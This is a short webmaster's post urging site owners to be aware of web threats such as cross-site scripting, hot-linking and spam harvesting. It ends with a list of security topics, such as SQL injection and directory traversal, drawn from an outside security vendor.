From the Webmaster,

How do hackers gain access to a website's sensitive data? What are a site's vulnerable areas? Who gets targeted?

To answer the last question first, ANYONE can be a target. The Internet is part of LIFE, and in LIFE, evil-doers prey and proliferate on the gullible and the naive. Even if your site is nothing but a gallery of photographs, you can be become a victim of bandwidth-theft, called hot-linking.

Any interactive site (the minute you include the simplest of contact forms in your web, you are interactive) can be hacked into. These banes of society are out to get your e-mail address to either spam you or sell it to a spammer; they could hot-link to your pictures, your application or styling scripts, which gains them your bandwidth; they might inject your site with their malicious cross site scripting which either hijacks a user's cookie session or redirects users to fake but identical looking pages; spread malware (malicious scripts) via your user's comments features to other browsers; they could even hi-jack your entire site and use it for their own criminal purposes or harvest sensitive information for defrauding purposes.

It is high time for web builders to wake up to the realities of these threats. AWARENESS is the key to creating defensive webs. Although constantly changing web technology is nowhere close to making applications more secure, it is our responsibility to do everything we absolutely can to prevent these bastards from achieving their goals.

This site does not have the space to go into the intracacies and technicalities of defense structures, so we provide the below list which references and links back to original sources.

  1. A company that deals exclusively with and offer a bunch of security tools, is this site, explore their content, and gird the loins of your website with their expertise and tools. Some salient articles are:
  2. SQL Injection
  3. Cross Site Scripting
  4. Web Security
  5. Directory Traversal
  6. Ajax Application Security
  7. Google Hacking
  8. Cross-Site Scripting (XSS)
  9. Email Injection
  10. Weak HTTP Passwords